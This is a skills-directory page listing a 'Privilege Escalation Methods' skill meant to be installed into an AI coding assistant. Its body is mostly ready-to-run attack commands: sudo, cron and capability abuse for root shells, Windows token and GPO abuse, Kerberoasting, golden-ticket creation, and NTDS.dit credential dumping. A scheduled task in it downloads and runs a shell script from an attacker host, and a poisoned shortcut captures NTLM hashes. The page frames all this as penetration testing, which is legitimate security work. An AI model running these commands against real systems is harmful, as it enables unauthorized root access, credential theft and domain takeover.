privilege escalation methods

Privilege Escalation Methods

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "privilege escalation methods" with this command: npx skills add davila7/claude-code-templates/davila7-claude-code-templates-privilege-escalation-methods

Privilege Escalation Methods

Purpose

Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.

Inputs/Prerequisites

  • Initial low-privilege shell access on target system

  • Kali Linux or penetration testing distribution

  • Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus

  • Understanding of Windows/Linux privilege models

  • For AD attacks: Domain user credentials and network access to DC

Outputs/Deliverables

  • Root or Administrator shell access

  • Extracted credentials and hashes

  • Persistent access mechanisms

  • Domain compromise (for AD environments)

Core Techniques

Linux Privilege Escalation

  1. Abusing Sudo Binaries

Exploit misconfigured sudo permissions using GTFOBins techniques:

Check sudo permissions

sudo -l

Exploit common binaries

sudo vim -c ':!/bin/bash' sudo find /etc/passwd -exec /bin/bash ; sudo awk 'BEGIN {system("/bin/bash")}' sudo python -c 'import pty;pty.spawn("/bin/bash")' sudo perl -e 'exec "/bin/bash";' sudo less /etc/hosts # then type: !bash sudo man man # then type: !bash sudo env /bin/bash

  1. Abusing Scheduled Tasks (Cron)

Find writable cron scripts

ls -la /etc/cron* cat /etc/crontab

Inject payload into writable script

echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh chmod +x /home/user/systemupdate.sh

Wait for execution, then:

/bin/bash -p

  1. Abusing Capabilities

Find binaries with capabilities

getcap -r / 2>/dev/null

Python with cap_setuid

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Perl with cap_setuid

/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

Tar with cap_dac_read_search (read any file)

/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa /usr/bin/tar -xvf key.tar

  1. NFS Root Squashing

Check for NFS shares

showmount -e <victim_ip>

Mount and exploit no_root_squash

mkdir /tmp/mount mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount cd /tmp/mount cp /bin/bash . chmod +s bash

  1. MySQL Running as Root

If MySQL runs as root

mysql -u root -p ! chmod +s /bin/bash exit /bin/bash -p

Windows Privilege Escalation

  1. Token Impersonation

Using SweetPotato (SeImpersonatePrivilege)

execute-assembly sweetpotato.exe -p beacon.exe

Using SharpImpersonation

SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

  1. Service Abuse

Using PowerUp

. .\PowerUp.ps1 Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1' Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

  1. Abusing SeBackupPrivilege

import-module .\SeBackupPrivilegeUtils.dll import-module .\SeBackupPrivilegeCmdLets.dll Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

  1. Abusing SeLoadDriverPrivilege

Load vulnerable Capcom driver

.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys .\ExploitCapcom.exe

  1. Abusing GPO

.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\&#x3C;USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" ` --GPOName "ADDITIONAL DC CONFIGURATION"

Active Directory Attacks

  1. Kerberoasting

Using Impacket

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request

Using CrackMapExec

crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt

  1. AS-REP Roasting

.\Rubeus.exe asreproast

  1. Golden Ticket

DCSync to get krbtgt hash

mimikatz# lsadump::dcsync /user:krbtgt

Create golden ticket

mimikatz# kerberos::golden /user:Administrator /domain:domain.local ` /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500

  1. Pass-the-Ticket

.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt klist # Verify ticket

  1. Golden Ticket with Scheduled Tasks

1. Elevate and dump credentials

mimikatz# token::elevate mimikatz# vault::cred /patch mimikatz# lsadump::lsa /patch

2. Create golden ticket

mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> ` /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi

3. Create scheduled task

schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" ` /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'" schtasks /run /s DOMAIN /TN "enterprise"

Credential Harvesting

LLMNR Poisoning

Start Responder

responder -I eth1 -v

Create malicious shortcut (Book.url)

[InternetShortcut] URL=https://facebook.com IconIndex=0 IconFile=\attacker_ip\not_found.ico

NTLM Relay

responder -I eth1 -v ntlmrelayx.py -tf targets.txt -smb2support

Dumping with VSS

vssadmin create shadow /for=C: copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

Quick Reference

Technique OS Domain Required Tool

Sudo Binary Abuse Linux No GTFOBins

Cron Job Exploit Linux No Manual

Capability Abuse Linux No getcap

NFS no_root_squash Linux No mount

Token Impersonation Windows No SweetPotato

Service Abuse Windows No PowerUp

Kerberoasting Windows Yes Rubeus/Impacket

AS-REP Roasting Windows Yes Rubeus

Golden Ticket Windows Yes Mimikatz

Pass-the-Ticket Windows Yes Rubeus

DCSync Windows Yes Mimikatz

LLMNR Poisoning Windows Yes Responder

Constraints

Must:

  • Have initial shell access before attempting escalation

  • Verify target OS and environment before selecting technique

  • Use appropriate tool for domain vs local escalation

Must Not:

  • Attempt techniques on production systems without authorization

  • Leave persistence mechanisms without client approval

  • Ignore detection mechanisms (EDR, SIEM)

Should:

  • Enumerate thoroughly before exploitation

  • Document all successful escalation paths

  • Clean up artifacts after engagement

Examples

Example 1: Linux Sudo to Root

Check sudo permissions

$ sudo -l User www-data may run the following commands: (root) NOPASSWD: /usr/bin/vim

Exploit vim

$ sudo vim -c ':!/bin/bash' root@target:~# id uid=0(root) gid=0(root) groups=0(root)

Example 2: Windows Kerberoasting

Request service tickets

$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

Crack with hashcat

$ hashcat -m 13100 hashes.txt rockyou.txt

Troubleshooting

Issue Solution

sudo -l requires password Try other enumeration (SUID, cron, capabilities)

Mimikatz blocked by AV Use Invoke-Mimikatz or SafetyKatz

Kerberoasting returns no hashes Check for service accounts with SPNs

Token impersonation fails Verify SeImpersonatePrivilege is present

NFS mount fails Check NFS version compatibility (vers=2,3,4)

Additional Resources

For detailed enumeration scripts, use:

  • LinPEAS: Linux privilege escalation enumeration

  • WinPEAS: Windows privilege escalation enumeration

  • BloodHound: Active Directory attack path mapping

  • GTFOBins: Unix binary exploitation reference

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Open in GitHubOpen in ClawHub

Related Skills

Related by shared tags or category signals.

Coding

senior-data-scientist

No summary provided by upstream source.

Repository SourceNeeds Review
-2K
davila7
Coding

senior-backend

No summary provided by upstream source.

Repository SourceNeeds Review
-1.2K
davila7
Coding

senior-frontend

No summary provided by upstream source.

Repository SourceNeeds Review
-947
davila7